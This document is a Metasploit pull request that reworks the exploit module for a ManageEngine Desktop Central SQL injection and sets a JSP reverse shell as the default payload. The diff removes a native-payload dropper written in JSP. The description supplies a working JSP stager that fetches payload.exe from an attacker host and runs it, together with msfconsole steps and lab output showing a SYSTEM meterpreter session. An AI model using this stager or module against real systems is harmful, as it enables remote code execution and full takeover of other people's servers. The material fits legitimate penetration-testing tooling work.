### PR TITLE
[Suggestion] Use jsp payloads instead of a custom stager hardcoded into modules

### DIFF
--- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb
+++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb
@@ -113,16 +113,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [false, 'Slash terminated web server root filepath (escape Windows paths with 4 slashes \\\\\\\\)'])
       ])
 
-    register_advanced_options(
-      [
-        OptInt.new('CHUNK_SIZE',
-          [true, 'Number of characters to send per request (< 7800)', 7500]),
-        OptInt.new('SLEEP',
-          [true, 'Seconds to sleep between injections (x1 for MySQL, x2.5 for PostgreSQL)', 2]),
-        OptBool.new('EXE_SMALL',
-          [true, 'Use exe-small encoding for better reliability', true]),
-      ])
-
   end
 
   def check
@@ -329,7 +319,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   #
-  # Creates the JSP that will assemble the payload on the server
+  # Creates the JSP payload to upload
   #
   def generate_jsp_encoded
     jsp = payload.raw.gsub(/[\n\t]/, '')

--- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb
+++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb
@@ -113,6 +113,12 @@ class MetasploitModule < Msf::Exploit::Remote
           [false, 'Slash terminated web server root filepath (escape Windows paths with 4 slashes \\\\\\\\)'])
       ])
 
+    register_advanced_options(
+      [
+        OptInt.new('SLEEP',
+          [true, 'Seconds to sleep between injections (x1 for MySQL, x2.5 for PostgreSQL)', 2]),
+      ])
+
   end
 
   def check

--- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb
+++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb
@@ -102,6 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
       'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'},
       'Privileged'     => false,            # Privileged on Windows but not on Linux targets
       'DisclosureDate' => "Jun 8 2014"))
 

--- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb
+++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'OSVDB', '110198' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2014/Aug/55' ]
         ],
-      'Arch'           => ARCH_X86,
+      'Arch'           => ARCH_JAVA,
       'Platform'       => %w{ linux win },
       'Targets'        =>
         [
@@ -331,80 +331,8 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Creates the JSP that will assemble the payload on the server
   #
-  def generate_jsp_encoded(files)
-    native_payload_name = rand_text_alpha(rand(6)+3)
-    ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
-
-    var_raw     = rand_text_alpha(rand(8) + 3)
-    var_ostream = rand_text_alpha(rand(8) + 3)
-    var_buf     = rand_text_alpha(rand(8) + 3)
-    var_decoder = rand_text_alpha(rand(8) + 3)
-    var_tmp     = rand_text_alpha(rand(8) + 3)
-    var_path    = rand_text_alpha(rand(8) + 3)
-    var_proc2   = rand_text_alpha(rand(8) + 3)
-    var_files   = rand_text_alpha(rand(8) + 3)
-    var_ch      = rand_text_alpha(rand(8) + 3)
-    var_istream = rand_text_alpha(rand(8) + 3)
-    var_file    = rand_text_alpha(rand(8) + 3)
-
-    files_decl = "{ "
-    files.each { |file|  files_decl << "\"#{file}\"," }
-    files_decl[-1] = "}"
-
-    if @my_target['Platform'] == 'linux'
-      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      chmod = %Q|
-      Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
-      Thread.sleep(200);
-      |
-
-      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      cleanup = %Q|
-      Thread.sleep(200);
-      Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
-      |
-    else
-      chmod = ''
-      cleanup = ''
-    end
-
-    jsp = %Q|
-    <%@page import="java.io.*"%>
-    <%@page import="sun.misc.BASE64Decoder"%>
-    <%
-    String[] #{var_files} = #{files_decl};
-    try {
-      int #{var_ch};
-      StringBuilder #{var_buf} = new StringBuilder();
-      for (String #{var_file} : #{var_files}) {
-        BufferedInputStream #{var_istream} =
-          new BufferedInputStream(new FileInputStream(#{var_file}));
-        while((#{var_ch} = #{var_istream}.read())!= -1)
-          #{var_buf}.append((char)#{var_ch});
-        #{var_istream}.close();
-      }
-
-      BASE64Decoder #{var_decoder} = new BASE64Decoder();
-      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
-
-      File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
-      String #{var_path} = #{var_tmp}.getAbsolutePath();
-
-      BufferedOutputStream #{var_ostream} =
-        new BufferedOutputStream(new FileOutputStream(#{var_path}));
-      #{var_ostream}.write(#{var_raw});
-      #{var_ostream}.close();
-      #{chmod}
-      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
-      #{cleanup}
-    } catch (Exception e) {
-    }
-    %>
-    |
-
-    jsp = jsp.gsub(/\n/, '')
-    jsp = jsp.gsub(/\t/, '')
-
+  def generate_jsp_encoded
+    jsp = payload.raw.gsub(/[\n\t]/, '')
     if @my_target['Database'] == 'postgresql'
       # Ruby's base64 encoding adds newlines at every 60 chars, strip them
       [jsp].pack("m*").gsub(/\n/, '')
@@ -443,79 +371,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
    end
 
-  # Generate the actual payload
-  def generate_exe_payload
-    opts = {:arch => @my_target.arch, :platform => @my_target.platform}
-    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
-    if datastore['EXE_SMALL'] and @my_target['Platform'] == 'win'
-      exe = Msf::Util::EXE.to_executable_fmt(framework, arch, platform,
-        payload.encoded, "exe-small", opts)
-    else
-      exe = generate_payload_exe(opts)
-    end
-    Rex::Text.encode_base64(exe)
-  end
-
   # Uploads the payload in chunks
   def inject_exec(fullpath)
-    base64_exe = generate_exe_payload
-    base64_exe_len = base64_exe.length
-
-    # We will be injecting in CHUNK_SIZE steps
-    chunk_size = datastore['CHUNK_SIZE']
-    copied = 0
-    counter = 0
-    if base64_exe_len < chunk_size
-      chunk_size = base64_exe_len
-    end
-    chunks = (base64_exe_len.to_f / chunk_size).ceil
-    time = chunks * datastore['SLEEP'] *
-     ((@my_target['Database'] == 'postgresql') ? 2.5 : 1)
-
-    # We dump our files in either C:\Windows\system32 or /tmp
-    # It's not very clean, but when using a MySQL target we have no other choice
-    # as we are using relative paths for injection.
-    # The Windows path has to be escaped with 4 backslashes because ruby eats one
-    # and the JSP eats the other.
-    files = Array.new(chunks)
-    files.map! do |file|
-      if @my_target['Platform'] == 'win'
-        file = "C:\\\\windows\\\\system32\\\\" + rand_text_alpha(rand(8)+3)
-      else
-        # Assuming Linux, let's hope we can write to /tmp
-        file = "/tmp/" + rand_text_alpha(rand(8)+3)
-      end
-    end
-
-    print_status("Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds")
-
-    if @my_target['Database'] == 'postgresql'
-      inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'")
-    else
-      # Assuming mysql
-      inject_sql("select '#{base64_exe[copied,chunk_size]}' from mysql.user into dumpfile '#{files[counter]}'")
-    end
-    register_file_for_cleanup(files[counter])
-    copied += chunk_size
-    counter += 1
-
-    while copied < base64_exe_len
-      if (copied + chunk_size) > base64_exe_len
-        # Last loop
-        chunk_size = base64_exe_len - copied
-      end
-      if @my_target['Database'] == 'postgresql'
-        inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'")
-      else
-        # Assuming mysql
-        inject_sql("select '#{base64_exe[copied,chunk_size]}' from mysql.user into dumpfile '#{files[counter]}'")
-      end
-      register_file_for_cleanup(files[counter])
-      copied += chunk_size
-      counter += 1
-    end
-
-    jsp_encoded = generate_jsp_encoded(files)
+    jsp_encoded = generate_jsp_encoded
     if @my_target['Database'] == 'postgresql'
       inject_sql("copy (select convert_from(decode('#{jsp_encoded}','base64'),'utf8')) to '#{fullpath}'")
     else


### PR DESCRIPTION
This PR updates the module `exploit/multi/http/manage_engine_dc_pmp_sqli`, access privileges gained remain the same.

## The current version of the module

As of now, the module:
- uploads a hardcoded `jsp` payload in the webroot.
- uploads a native payload encoded in base64, and split on different files on `C:\Windows\System32`.
- The hardcoded payload decodes the native one, merges the parts, and creates a new process.

## What's wrong?

- The file upload is done by the `postgresql` process, and it's likely that permissions don't allow writing into `System32`.
- If the file upload into `System32` fails, it's not possible to obtain any session (except by editing the module).
- To replace `System32` with another directory, the user needs a full path to a writable directory to upload the binary payload, which is not always possible to have.
- I think it should be up to the user to decide if they want to upload additional binary files, as only the jsp file upload is unevitable (in some cases, a jsp shell is enough).

## The updated version I came with

- Only jsp payloads are allowed, I changed the architecture, no hardcoded payloads.
- It's still possible to get a meterpreter or native session, see below at reproducing.
- The code is significantly shorter, and more focused on the vulnerability

## Reproducing
I'm using the following IP addresses for testing.
| IP Address | Info           |
| -------------- | ------------- |
| 10.13.37.1       | attacker machine (running metasploit on Linux) |
| 10.13.37.2       | victim machine (running a vulnerable Manage Engine version     |

### Get a meterpreter session

This is just a quick PoC for getting a meterpreter session, would be nice to have a jsp stager in the future, the HTTP Server is running as `NT AUTHORITY\SYSTEM` from my testing, so no permission issues.

Write this file into `/tmp/stager.jsp`:
```java
<%@page import="java.io.*"%>
<%
try{
  BufferedInputStream in = new BufferedInputStream(new java.net.URL("http://10.13.37.1:8080/payload.exe").openStream());
  FileOutputStream myout = new FileOutputStream("C:\\b.exe");
  byte dataBuffer[] = new byte[1024];
  int bytesRead;
  while ((bytesRead = in.read(dataBuffer, 0, 1024)) != -1) {
    myout.write(dataBuffer, 0, bytesRead);
  }
  myout.close();
  Process myproc = Runtime.getRuntime().exec("C:\\b.exe");
} catch (IOException e) {
}
%>
```
Run `msfconsole`, and write the following lines:

```
use exploit/multi/script/web_delivery
set target 5
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 10.13.37.1
set LPORT 5678
set URIPATH "/payload.exe"
exploit -z


use exploit/multi/http/manage_engine_dc_pmp_sqli
set rhosts 10.13.37.2
set payload generic/custom
set payloadfile /tmp/stager.jsp
exploit
```

Output:
```
[*] Selecting target, this might take a few seconds...
[*] Selected target Desktop Central v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows
[*] Requesting chpnyajk.jsp
[*] 10.13.37.2       web_delivery - Delivering Payload (207872 bytes)
[*] Meterpreter session 2 opened (10.13.37.1:5678 -> 10.13.37.2:62470) at 2020-07-06 22:31:11 +0200
[!] This exploit may require manual cleanup of 'C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\modbrlbl.txt' on the target
[!] This exploit may require manual cleanup of 'C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\chpnyajk.jsp' on the target
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/manage_engine_dc_pmp_sqli) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                      Connection
  --  ----  ----                     -----------                      ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN7VM-PC  10.13.37.1:5678 -> 10.13.37.2:62470 (10.13.37.2)

msf5 exploit(multi/http/manage_engine_dc_pmp_sqli) > 
```

### Regular shell

Compatible payloads are listed below:
```
msf5 exploit(multi/http/manage_engine_dc_pmp_sqli) > show payloads

Compatible Payloads
===================

   #  Name                        Disclosure Date  Rank    Check  Description
   -  ----                        ---------------  ----    -----  -----------
   0  generic/custom                               manual  No     Custom Payload
   1  generic/shell_bind_tcp                       manual  No     Generic Command Shell, Bind TCP Inline
   2  generic/shell_reverse_tcp                    manual  No     Generic Command Shell, Reverse TCP Inline
   3  java/jsp_shell_bind_tcp                      manual  No     Java JSP Command Shell, Bind TCP Inline
   4  java/jsp_shell_reverse_tcp                   manual  No     Java JSP Command Shell, Reverse TCP Inline
```

No additional steps to use them, just set the options specific to the payload being used.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/manage_engine_dc_pmp_sqli`
- [ ]  `set payload  java/jsp_shell_reverse_tcp`
- [ ]  set the options
- [ ]  exploit
- [ ]  check if it spawns a shell if the software it's tested on is vulnerable

Tested on [Manage Engine v80276](http://archives.manageengine.com/desktop-central/80276/)
## Feedback

I'd like to know what others think of this, I needed to use this module for testing my SQL injection library, and had to make the modifications in order to get it to work, any feedback is greatly appreciated.

I'll update the documentation/test it on other versions if the changes are approved